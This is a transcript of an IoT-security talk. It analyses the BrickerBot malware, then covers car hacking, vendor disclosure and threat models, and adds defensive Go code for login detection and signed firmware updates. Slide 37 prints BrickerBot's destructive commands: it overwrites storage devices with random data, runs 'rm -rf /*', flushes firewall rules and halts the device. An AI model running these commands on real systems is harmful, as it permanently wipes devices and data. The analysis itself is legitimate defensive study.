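    ast.unparse also collapses the padded whitespace, so `time . sleep ( 3 )`
    comes back as `time.sleep(3)`."""
    tree = DeadIfRemover().visit(ast.parse(src))
    # A body emptied by the transform is not valid Python; pad it with `pass`.
    for node in ast.walk(tree):
        body = getattr(node, "body", None)
        if isinstance(body, list) and not body:
            body.append(ast.Pass())
    return ast.unparse(tree)


def extract_strings(src, min_len=4):
    """The 'strings first' step: every string literal of at least min_len
    characters, in source order (the analogue of strings(1) for a script)."""
    consts = [
        n for n in ast.walk(ast.parse(src))
        if isinstance(n, ast.Constant) and isinstance(n.value, str)
        and len(n.value) >= min_len
    ]
    consts.sort(key=lambda n: (n.lineno, n.col_offset))
    return [n.value for n in consts]


def statement_count(src):
    """Number of top-level statements, for a before/after comparison."""
    return len(ast.parse(src).body)


if __name__ == "__main__":
    print(clean_source(SAMPLE))
    print(extract_strings(SAMPLE))
```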
36. OK, now things are looking a bit cleaner; we can see functions. Names that have been obfuscated are lost, but one can eventually rename them according to their function, similar to what one does with functions in an unknown binary.
This is also after pretty-printing the script so that we get rid of the excessive/additional whitespace.
Also, as mentioned earlier, no libraries are imported, so the code still won’t run.
You should be getting a better picture of the roadblocks placed in the code.
Brickerbot: Source code - eliminate dead code
def IIi1IIii11I1I(targetip, targetport):
    # Inferred purpose: queue a (target ip, port) job once; duplicates are
    # skipped by hashing the tuple. The dicts are module-level bookkeeping.
    global i1Iiii1i11i
    O0000oO0O = (targetip, int(targetport))
    I11i1I = hash(O0000oO0O)
    if I11i1I in iIIiii11Ii1:
        return
    IiI1i1ii1[I11i1I] = 0
    ooOo0I1ii1i[I11i1I] = (targetip, int(targetport))
    oo0[I11i1I] = time.time() + i1Iiii1i11i * 60  # deadline, minutes from now
    iIoO000oO[I11i1I] = None
    iIIiii11Ii1.append(I11i1I)

def i1iiiiIi(targetip, targetport, jobhash):
    # Inferred purpose: open a non-blocking TCP socket to the target and
    # register it in the bookkeeping dicts, keyed by the socket's hash.
    O0000oO0O = (targetip, int(targetport))
    O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    O0OOo00o00o.setblocking(0)
    try:
        O0OOo00o00o.connect(O0000oO0O)
    except:
        pass
    I11i1I = hash(O0OOo00o00o)
    O00OiiI1iIiiI.append(O0OOo00o00o)
    Oooo0[I11i1I] = (targetip, int(targetport))
    Iii1iiiI[I11i1I] = 0
    i1I11IIIIIi[I11i1I] = time.time()
    I1iiO000o00o0[I11i1I] = jobhash
    iIoO000oO[jobhash] = O0OOo00o00o
    return O0OOo00o00o
37. Now we can go back to step 1 of the static malware analysis process, searching for strings.
This particular segment includes commands that overwrite storage on a particular device with random data. Routes and firewall rules are cleared from memory and deleted. Then the system is stopped and rebooted. By now there should be no code left to run, so your home router is now useless.
So what do we know now?
1) this code is annoying
2) so is The Doctor
3) all devices with the default username and password will get disabled permanently
4) Vulnerable devices are fixed now; since they can’t work, they’re safe
So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger embedded systems and Internet-connected devices face similar threats? Can a brickerbot for my washing machine be far away? Would other larger devices be more vulnerable? Say, my car?
Brickerbot: Source code - Strings, bricking
ii11II += '''busybox route del default
cat /dev/urandom >/dev/mtdblock0 &
cat /dev/urandom >/dev/mtdblock1 &
cat /dev/urandom >/dev/mtdblock2 &
cat /dev/urandom >/dev/mtdblock3 &
cat /dev/urandom >/dev/mtdblock4 &
cat /dev/urandom >/dev/mtdblock5 &
cat /dev/urandom >/dev/mmcblk0 &
cat /dev/urandom >/dev/mmcblk0p9 &
cat /dev/urandom >/dev/mmcblk0p12 &
cat /dev/urandom >/dev/mmcblk0p13 &
cat /dev/urandom >/dev/root &
cat /dev/urandom >/dev/mmcblk0p8 &
cat /dev/urandom >/dev/mmcblk0p16 &
'''
ii11II += '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP
halt -n -f
reboot
'''
38. What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see what an expert on automotive security thinks.
Charlie Miller is formerly of the NSA, but has made a name for himself in the private sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain Picard, clever and wise.
He wrote the first public exploits for Android and iOS, on the Google G1 and original iPhone. Later he and Chris Valasek received a grant from DARPA’s Cyber Fast Track program (the same one founded by Mudge) to research automotive security. So he moved on from hacking PCs, to hacking phones, to hacking the very cars you and I drive.
And people complained, ‘but those aren’t remote exploits. You’ve got to be in the car to hack them. Any crook can do that.’
And verily, Charlie and Chris developed remote exploits.
So when Charlie says that
1) it’s not simple to hack all the cars
2) there aren’t as many people hacking cars
you’d do well to believe him.
“Zombie” cars
39. Except movie hackers…
If you’ve seen the seminal ‘Hackers’ (1996) you know that “real” hackers can be identified by their hairstyles, dreadlocks in fact possibly being a necessary factor in successful cyber attacks, e.g. Matthew Lillard’s character Cereal Killer. As one can see, Ms. Theron’s character, Cypher, must be quite the criminal hacker. After all, the main heroes in the film (Johnson, Diesel & Statham) lack both hair and computer skills.
Realistically one can get a better sense of the threat posed by Cypher by viewing her environment. She is obviously well-funded (either state-backed or via independent fortune) and employs a full team of experts, especially experts that can hack cars.
When an underling tells her there are a couple thousand cars in the vicinity of her target, she orders him to hack all of them. Yes, all of them. Never mind the brand, the telematics system, any and all firmware (or lack of such) within each of these thousands of automobiles. Those hacker dreads must confer some extreme hacking powers.
“Zombie” cars - “It’s Zombie time.”
We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
40. We should just brick everybody's car in a 5 mile radius. It’s not like anyone needs to get to work, pick up their kids, drive a buddy to the hospital, drive for lyft/uber. Maybe they didn’t really need their personal cars.
This goes back to the original idea of abdicating any responsibility as developers and manufacturers of IoT devices to law enforcement. Or in the case of The Doctor, to vigilantes.
It's a common idea that fixing bugs at the earliest point in development is many times cheaper and less dangerous than patching them after release. Though we can’t always fix before customers take possession.
It’s possible to release firmware updates and patches afterwards, but there is not always incentive to do so. The manufacturer of my car will occasionally release updates for the telematics system living in my dash, but the manufacturer of my new Internet-enabled toaster might say it’s no longer supported.
This is not usually a problem. Until attackers not as benevolent as the Wifatch and Hajime authors or Charlie & Chris discover and exploit a vulnerability to turn your new Mustang into a torpedo. With Miller & Valasek I know they’ll make an effort to reach out to the manufacturer and enable a patch or update to be created.
We can learn lessons from the way vulnerability reports are handled on other platforms. Embedded systems and IoT devices are not as dissimilar from desktop and server PCs as one would think. The same way security researchers reach out to Apple or Google for bugs in their phone OSes, they can reach out to various device manufacturers.
“Zombie” cars
So in order to stop Criminals from hijacking our cars and turning them into
bombs...
41. It can be difficult to get industry members to agree on issues like vulnerability disclosure,
regular patching and in general working with outside security researchers. It is very
much like the common description of ‘herding cats’. While many of the players may
look similar and even share similar interests it is difficult to get them all to come to
the table.
Each company has no special reason to trust another. It usually takes commonly trusted
individuals and backing from companies with greater resources just to begin the
conversation.
Fortunately we’re seeing motion towards that goal in a small subset of the Internet of
Things/Internet-connected embedded devices.
Security: Gaining industry buy-in
43. How do we get all these cats eating peacefully at the same bowl?
We can start by selecting someone credible and widely trusted as a focal point for the multitude of players. Get a Pied Piper that all the cats can turn towards. In this case that would be Renderman (Brad Haines), a well-known and respected security researcher. He’s also a CISSP.
Renderman has a wide range of experience with penetration testing, wireless security and computer security research. He is a published author and a speaker at numerous computer security (Black Hat USA) and hacker (Def Con) conferences.
The interesting part of this is that Renderman is operating within the category of items that fall under the heading ‘Adult Sex Toys’ on Amazon.com.
One might have expected that other personal IoT devices, such as fitness trackers, would be where more security research would occur. The recent information leak from Strava, which showed running paths of US armed forces members, is one such area of research. Here a personal IoT device’s lack of default security and privacy controls ends up violating Operational Security (OPSEC) at US bases around the world. The main threat is not the bases’ locations (arguably opposition forces and host countries already have that knowledge), but more that of current intelligence confirming activity at the bases and possibly the number/names of active personnel.
Renderman has accomplished something that those of us in other specialties (e.g. Antivirus/Anti-malware) haven’t: he’s managed to convince disparate manufacturers to trust him, both as a source of best security practices and as an interface to the wider community of vulnerability researchers and hackers.
Security: Gaining industry buy-in; Doing it right
1. Get someone credible to organize/liaise with industry players
a. Renderman
2. Provide guidelines for disclosure to vendors
3. Provide guidelines for communication with researchers
4. Suggest/provide solutions
a. Mostly suggest. Nobody’s using provided code.
5. Branding
a. Internet of Dongs Project
b. DVEs(Dong Vulnerability and Exposures)
44. Q: What sort of threat model are IoT vendors using?
A: Good question. Default credentials imply there is no threat model. A basic threat
model would take into account the simplest attacker, your common script kiddie, who
takes a dictionary of default credentials and a list of target addresses and feeds them to
a scanner or ready-made tool. Even after the number of in-the-wild IoT worms we’ve
seen, the script kiddie would still end up with control of a significant number of IoT
devices. Unfortunately security is currently at best an afterthought for a large number
of vendors.
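Two defender-side responses to the default-credential problem described above, as an added example that is not part of the original talk: a first-boot password policy that refuses well-known factory defaults, and a detector run over a constructed authentication log that flags guessing bursts and successful logins by factory accounts whose passwords were never rotated. The log format, the account names, the default-password list and the threshold of three failures are all assumptions made for this example.

```go
package main

import (
	"fmt"
	"strings"
)

// sampleAuthLog is a constructed device authentication log; the key=value
// layout is an assumption for this example, not any vendor's real format.
const sampleAuthLog = `2018-02-10T03:14:07Z telnet src=203.0.113.5 user=admin result=fail
2018-02-10T03:14:08Z telnet src=203.0.113.5 user=root result=fail
2018-02-10T03:14:09Z telnet src=203.0.113.5 user=admin result=ok
2018-02-10T03:20:01Z telnet src=198.51.100.9 user=support result=fail
2018-02-10T03:20:02Z telnet src=198.51.100.9 user=support result=fail
2018-02-10T03:20:03Z telnet src=198.51.100.9 user=support result=fail
2018-02-10T03:20:04Z telnet src=198.51.100.9 user=support result=fail
2018-02-10T09:00:00Z https src=192.0.2.44 user=owner result=ok`

// AuthEvent is one parsed log line.
type AuthEvent struct {
	Time, Service, Src, User string
	Success                  bool
}

// parseAuthLog parses the constructed format; malformed lines are skipped
// rather than trusted.
func parseAuthLog(log string) []AuthEvent {
	var events []AuthEvent
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		fields := strings.Fields(line)
		if len(fields) < 5 {
			continue
		}
		ev := AuthEvent{Time: fields[0], Service: fields[1]}
		for _, kv := range fields[2:] {
			k, v, ok := strings.Cut(kv, "=")
			if !ok {
				continue
			}
			switch k {
			case "src":
				ev.Src = v
			case "user":
				ev.User = v
			case "result":
				ev.Success = v == "ok"
			}
		}
		events = append(events, ev)
	}
	return events
}

// Finding records which source tripped which rule.
type Finding struct {
	Kind string // "guessing-burst" or "default-account-login"
	Src  string
}

// factoryAccounts are accounts that ship with a default password on the
// constructed example device.
var factoryAccounts = map[string]bool{"admin": true, "root": true, "support": true}

// detect flags (1) a source once it reaches failThreshold failed logins and
// (2) every successful login by a factory account whose password is still the
// default (rotated[user] == false).
func detect(events []AuthEvent, rotated map[string]bool, failThreshold int) []Finding {
	fails := map[string]int{}
	burstReported := map[string]bool{}
	var out []Finding
	for _, ev := range events {
		if !ev.Success {
			fails[ev.Src]++
			if fails[ev.Src] >= failThreshold && !burstReported[ev.Src] {
				burstReported[ev.Src] = true
				out = append(out, Finding{"guessing-burst", ev.Src})
			}
			continue
		}
		if factoryAccounts[ev.User] && !rotated[ev.User] {
			out = append(out, Finding{"default-account-login", ev.Src})
		}
	}
	return out
}

// knownDefaults is a small constructed list of factory-default passwords; a
// real first-boot wizard would consult a much larger list.
var knownDefaults = map[string]bool{"admin": true, "password": true, "1234": true, "12345": true, "root": true, "default": true}

// acceptablePassword is the device-side policy applied when the owner sets a
// password: reject known defaults, the user name itself, and short strings.
func acceptablePassword(user, pw string, minLen int) error {
	switch {
	case knownDefaults[strings.ToLower(pw)]:
		return fmt.Errorf("password is a well-known factory default")
	case strings.EqualFold(user, pw):
		return fmt.Errorf("password must differ from the user name")
	case len(pw) < minLen:
		return fmt.Errorf("password shorter than %d characters", minLen)
	}
	return nil
}

func main() {
	// Nothing has been rotated yet, so the admin login from 203.0.113.5 is flagged.
	for _, f := range detect(parseAuthLog(sampleAuthLog), map[string]bool{}, 3) {
		fmt.Printf("%-22s %s\n", f.Kind, f.Src)
	}
	fmt.Println(acceptablePassword("admin", "admin", 8))
}
```

The signature check in `detect` is deliberately keyed on a rotation map rather than on the log alone: a device that records when each factory account's password was changed can tell a legitimate owner login apart from a default-credential login, which the log line by itself cannot.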
A proper threat model would need to take into account attackers of various skill levels
and budgets.
Script kiddies might be kept at bay simply by allowing users to easily change
passwords, or by using public-key cryptography to ensure firmware updates come only
from the manufacturer. Best practices in security will, overall, protect the bulk of users.
If your threat model also includes nation-state actors, then it’s likely your
development budget is of a commensurate size.
It would also need to consider the attack surface for a given device. Does it connect to
the Internet? Is the firmware protected from modification? Can an attacker cause the
Li-ion batteries to overload or ignite? Is it possible to inject malicious traffic into the
stream of commands sent to the device?
Regardless, these are factors that need to be considered at the beginning of the
development cycle and not once the product is in the hands of consumers. Once there, it
is considerably more expensive to mitigate (e.g. by patching, or recalling devices).
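The "firmware updates come only from the manufacturer" control above, worked through as an added example that is not part of the original talk: the manufacturer signs each image with an Ed25519 private key, and the device verifies the signature with the embedded public key before anything touches flash. The example also goes one step beyond the text by covering the version number with the signature and refusing older images, so a genuinely signed but outdated (and possibly vulnerable) image cannot be replayed. The update layout (4-byte version, 64-byte signature, payload) is an assumption made for this example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Constructed update layout (an assumption for this example):
//   bytes 0..3   version, big-endian uint32
//   bytes 4..67  Ed25519 signature over version || payload
//   bytes 68..   firmware payload
const (
	versionLen = 4
	headerLen  = versionLen + ed25519.SignatureSize
)

var (
	errTooShort = errors.New("update shorter than header")
	errBadSig   = errors.New("signature does not verify against manufacturer key")
	errRollback = errors.New("update version is not newer than installed version")
)

// Package is the manufacturer side: sign version||payload with the private
// key, which never leaves the build system.
func Package(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	msg := make([]byte, versionLen+len(payload))
	binary.BigEndian.PutUint32(msg, version)
	copy(msg[versionLen:], payload)
	sig := ed25519.Sign(priv, msg)
	out := make([]byte, 0, headerLen+len(payload))
	out = append(out, msg[:versionLen]...)
	out = append(out, sig...)
	return append(out, payload...)
}

// Verify is the device side. Only the public key is on the device. The
// signature is checked before the version field is trusted, so unsigned data
// can never influence the rollback decision.
func Verify(pub ed25519.PublicKey, installed uint32, update []byte) (uint32, []byte, error) {
	if len(update) < headerLen {
		return 0, nil, errTooShort
	}
	version := update[:versionLen]
	sig := update[versionLen:headerLen]
	payload := update[headerLen:]
	msg := append(append([]byte{}, version...), payload...)
	if !ed25519.Verify(pub, msg, sig) {
		return 0, nil, errBadSig
	}
	v := binary.BigEndian.Uint32(version)
	if v <= installed {
		return 0, nil, errRollback
	}
	return v, payload, nil
}

// Demo exercises the three cases a device must handle: a genuine newer image,
// a tampered image, and a replayed older image that carries a valid signature.
func Demo() (accepted uint32, tampered, replayed error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	v1 := Package(priv, 1, []byte("firmware image v1 (constructed)"))
	v2 := Package(priv, 2, []byte("firmware image v2 (constructed)"))
	accepted, _, err = Verify(pub, 1, v2)
	if err != nil {
		panic(err)
	}
	bad := append([]byte{}, v2...)
	bad[len(bad)-1] ^= 0x01 // flip one payload bit
	_, _, tampered = Verify(pub, 1, bad)
	_, _, replayed = Verify(pub, 2, v1)
	return accepted, tampered, replayed
}

func main() {
	accepted, tampered, replayed := Demo()
	fmt.Println("accepted version:", accepted)
	fmt.Println("tampered image:", tampered)
	fmt.Println("replayed v1 on v2:", replayed)
}
```

In a real device the public key would live in a read-only region (or be pinned by a boot ROM), since an attacker who can rewrite the key can sign their own images; the version comparison likewise needs a monotonic counter that the attacker cannot reset.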
Questions?